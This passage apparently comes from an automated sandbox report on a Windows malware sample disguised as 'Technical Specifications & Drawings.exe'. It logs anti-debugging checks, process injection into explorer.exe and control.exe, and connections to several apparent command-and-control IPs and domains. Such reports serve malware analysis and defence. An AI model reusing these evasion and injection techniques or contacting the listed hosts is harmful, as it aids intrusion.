          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]4_2_01864AEF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]4_2_01864AEF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]4_2_01864AEF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]4_2_01864AEF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]4_2_01864AEF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]4_2_01864AEF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]4_2_01864AEF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]4_2_01864AEF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]4_2_01864AEF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]4_2_01864AEF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]4_2_01864AEF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A5210 mov eax, dword ptr fs:[00000030h]4_2_017A5210
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A5210 mov ecx, dword ptr fs:[00000030h]4_2_017A5210
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A5210 mov eax, dword ptr fs:[00000030h]4_2_017A5210
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A5210 mov eax, dword ptr fs:[00000030h]4_2_017A5210
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AAA16 mov eax, dword ptr fs:[00000030h]4_2_017AAA16
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AAA16 mov eax, dword ptr fs:[00000030h]4_2_017AAA16
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B8A0A mov eax, dword ptr fs:[00000030h]4_2_017B8A0A
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186AA16 mov eax, dword ptr fs:[00000030h]4_2_0186AA16
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186AA16 mov eax, dword ptr fs:[00000030h]4_2_0186AA16
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D2AE4 mov eax, dword ptr fs:[00000030h]4_2_017D2AE4
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D2ACB mov eax, dword ptr fs:[00000030h]4_2_017D2ACB
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017BAAB0 mov eax, dword ptr fs:[00000030h]4_2_017BAAB0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017BAAB0 mov eax, dword ptr fs:[00000030h]4_2_017BAAB0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DFAB0 mov eax, dword ptr fs:[00000030h]4_2_017DFAB0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186EA55 mov eax, dword ptr fs:[00000030h]4_2_0186EA55
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01834257 mov eax, dword ptr fs:[00000030h]4_2_01834257
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A52A5 mov eax, dword ptr fs:[00000030h]4_2_017A52A5
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A52A5 mov eax, dword ptr fs:[00000030h]4_2_017A52A5
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A52A5 mov eax, dword ptr fs:[00000030h]4_2_017A52A5
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A52A5 mov eax, dword ptr fs:[00000030h]4_2_017A52A5
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A52A5 mov eax, dword ptr fs:[00000030h]4_2_017A52A5
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0185B260 mov eax, dword ptr fs:[00000030h]4_2_0185B260
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0185B260 mov eax, dword ptr fs:[00000030h]4_2_0185B260
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01878A62 mov eax, dword ptr fs:[00000030h]4_2_01878A62
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DD294 mov eax, dword ptr fs:[00000030h]4_2_017DD294
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DD294 mov eax, dword ptr fs:[00000030h]4_2_017DD294
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01862D82 mov eax, dword ptr fs:[00000030h]4_2_01862D82
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01862D82 mov eax, dword ptr fs:[00000030h]4_2_01862D82
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01862D82 mov eax, dword ptr fs:[00000030h]4_2_01862D82
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01862D82 mov eax, dword ptr fs:[00000030h]4_2_01862D82
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01862D82 mov eax, dword ptr fs:[00000030h]4_2_01862D82
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01862D82 mov eax, dword ptr fs:[00000030h]4_2_01862D82
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01862D82 mov eax, dword ptr fs:[00000030h]4_2_01862D82
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CC577 mov eax, dword ptr fs:[00000030h]4_2_017CC577
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CC577 mov eax, dword ptr fs:[00000030h]4_2_017CC577
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018705AC mov eax, dword ptr fs:[00000030h]4_2_018705AC
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018705AC mov eax, dword ptr fs:[00000030h]4_2_018705AC
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C7D50 mov eax, dword ptr fs:[00000030h]4_2_017C7D50
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E3D43 mov eax, dword ptr fs:[00000030h]4_2_017E3D43
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D4D3B mov eax, dword ptr fs:[00000030h]4_2_017D4D3B
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D4D3B mov eax, dword ptr fs:[00000030h]4_2_017D4D3B
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\control.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe Network Connect: 109.234.162.62 80
          Source: C:\Windows\explorer.exe Domain query: www.mexc-event-partner.site
          Source: C:\Windows\explorer.exe Domain query: www.gzkanglongkeji.com
          Source: C:\Windows\explorer.exe Network Connect: 107.155.208.43 80
          Source: C:\Windows\explorer.exe Network Connect: 184.168.107.80 80
          Source: C:\Windows\explorer.exe Network Connect: 67.23.226.119 80
          Source: C:\Windows\explorer.exe Domain query: www.kirchhoff-darryl.com
          Source: C:\Windows\explorer.exe Network Connect: 67.223.117.72 80
          Source: C:\Windows\explorer.exe Domain query: www.boshi-eg.online
          Source: C:\Windows\explorer.exe Domain query: www.tomoptique.fr
          Source: C:\Windows\explorer.exe Domain query: www.esandcraic.com
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Section unmapped: C:\Windows\SysWOW64\control.exe base address: 1C0000
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Memory written: C:\Users\user\Desktop\Technical Specifications & Drawings.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Thread register set: target process: 3968
          Source: C:\Windows\SysWOW64\control.exe Thread register set: target process: 3968
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process created: C:\Users\user\Desktop\Technical Specifications & Drawings.exe C:\Users\user\Desktop\Technical Specifications & Drawings.exe
          Source: explorer.exe, 00000005.00000000.320653170.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.265661607.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.365897983.0000000000688000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanEXE^
          Source: explorer.exe, 00000005.00000000.329795271.00000000080ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.302606541.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.321297166.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.321297166.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.366589864.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.298681705.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.321297166.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.366589864.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.298681705.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000000.297954102.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.365954080.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.265765381.000000000069D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd4
          Source: explorer.exe, 00000005.00000000.321297166.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.366589864.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.298681705.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: WProgram Manager
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Users\user\Desktop\Technical Specifications & Drawings.exe VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
